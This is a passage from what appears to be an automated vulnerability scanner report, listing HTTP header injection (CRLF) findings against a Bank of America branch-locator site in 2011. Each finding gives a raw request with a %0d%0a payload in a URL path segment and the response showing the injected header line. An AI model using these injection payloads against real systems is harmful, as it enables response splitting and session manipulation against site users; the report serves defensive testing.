Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 4061d%0d%0a1bfd652828 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/4061d%0d%0a1bfd652828=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=AAF2BA2111F1910393CA382CA414D92E.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/4061d
1bfd652828=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.136. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c3d89%0d%0ab06a309682b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/c3d89%0d%0ab06a309682b/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=AC2A9FEB0221DBA40F72CC3834F89DD4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/c3d89
b06a309682b/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.137. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c82a1%0d%0ac6384950a1d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7860__E__Admiral_74115_TULSA_OK/c82a1%0d%0ac6384950a1d/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=2585A9707EE97B4AD2AEFD1674823226.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/c82a1
c6384950a1d/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.138. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 89ecc%0d%0ad6776a519c8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/89ecc%0d%0ad6776a519c8/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=2E694E9AFBDCD113CB49BA0E85A9E67C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/89ecc
d6776a519c8/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.139. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4ddc9%0d%0aaee9bc0c4e6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7860__E__Admiral_74115_TULSA_OK/4ddc9%0d%0aaee9bc0c4e6/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=7C3172E39D04FCD65BDD4F42609472CE.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/4ddc9
aee9bc0c4e6/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.140. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 10eae%0d%0a0b41c680fd was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/10eae%0d%0a0b41c680fd=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=D132692D4A37133D66DB0C9430565B2B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/10eae
0b41c680fd=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.141. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a8673%0d%0a5c12b4342e4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/a8673%0d%0a5c12b4342e4/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=AE4A8795058B6D4094CA383D284ABE84.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/a8673
5c12b4342e4/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.142. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a78cc%0d%0a69e4d8ba116 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/a78cc%0d%0a69e4d8ba116/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=317EED45D1C470FFE1EBFF35D33D741F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/a78cc
69e4d8ba116/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.143. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 1c1a7%0d%0a75b62368b5e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1c1a7%0d%0a75b62368b5e/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=A62E8E1D17D50060D603789B540EB213.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1c1a7
75b62368b5e/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.144. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 9e350%0d%0a4974bbad303 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/9e350%0d%0a4974bbad303/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=9DD489687D9A7D8C2CBA7952A293F627.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/9e350
4974bbad303/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.145. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e59c2%0d%0af5b6f914146 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/e59c2%0d%0af5b6f914146=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=E3329ADB9427A29E8562370954FBCD16.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/e59c2
f5b6f914146=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.146. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2e386%0d%0a2caebaf69e4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2e386%0d%0a2caebaf69e4/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=8BB511F42F630E0CD35CA3A2D9EE705F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2e386
2caebaf69e4/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.147. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b89e9%0d%0addcacfa5aaa was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/b89e9%0d%0addcacfa5aaa/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=62E6BF07D9E24DBA2CD849B317177605.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/b89e9
ddcacfa5aaa/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.148. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 31ad2%0d%0ab151f0ec4e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/31ad2%0d%0ab151f0ec4e1/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=D24C04B26539F9E4A0A5D58E5EBCAC30.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/31ad2
b151f0ec4e1/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.149. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload fce9d%0d%0aa5f2fc6cd6c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/fce9d%0d%0aa5f2fc6cd6c/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=CC251C714B022FCC53BC14C88D6B1B89.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/fce9d
a5f2fc6cd6c/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.150. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d30ef%0d%0a9509321715 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/d30ef%0d%0a9509321715=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=E54CCD9D88AD2A2BA27175FEA69FCFB8.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/d30ef
9509321715=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.151. http://locators.bankofamerica.com/locator/locator/BrowseByCityAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByCityAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload bd629%0d%0ab2d543b8b31 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/bd629%0d%0ab2d543b8b31 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=2B40567AEEDE88AD5576F62E1A195B41.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/bd629
b2d543b8b31?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.152. http://locators.bankofamerica.com/locator/locator/BrowseByCityLetterAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByCityLetterAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 29e8a%0d%0a4268082230b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/29e8a%0d%0a4268082230b HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=91684F37881AE0622C154D1288FAE12A.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/29e8a
4268082230b?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.153. http://locators.bankofamerica.com/locator/locator/BrowseByPostalCodeAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByPostalCodeAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 46e96%0d%0a392dba7184a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/46e96%0d%0a392dba7184a HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=90F0E357450B984DDB015C138909EE01.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/46e96
392dba7184a?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.154. http://locators.bankofamerica.com/locator/locator/BrowseByStateAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/BrowseByStateAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8de52%0d%0ad2721823023 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/8de52%0d%0ad2721823023 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=5D9DD5262B2D21180950B503369F2641.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/8de52
d2721823023?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.155. http://locators.bankofamerica.com/locator/locator/FullPageSearchAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/FullPageSearchAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5dde2%0d%0a2ce32225692 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5dde2%0d%0a2ce32225692 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=98F694D2FAB3B898E6CA0BD6250E8EAE.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5dde2
2ce32225692?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.156. http://locators.bankofamerica.com/locator/locator/InternationalLocAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/InternationalLocAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 374c8%0d%0a1f59a7f6d99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/374c8%0d%0a1f59a7f6d99 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=358EF0FDE3B161721BE7AA793384AC69.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
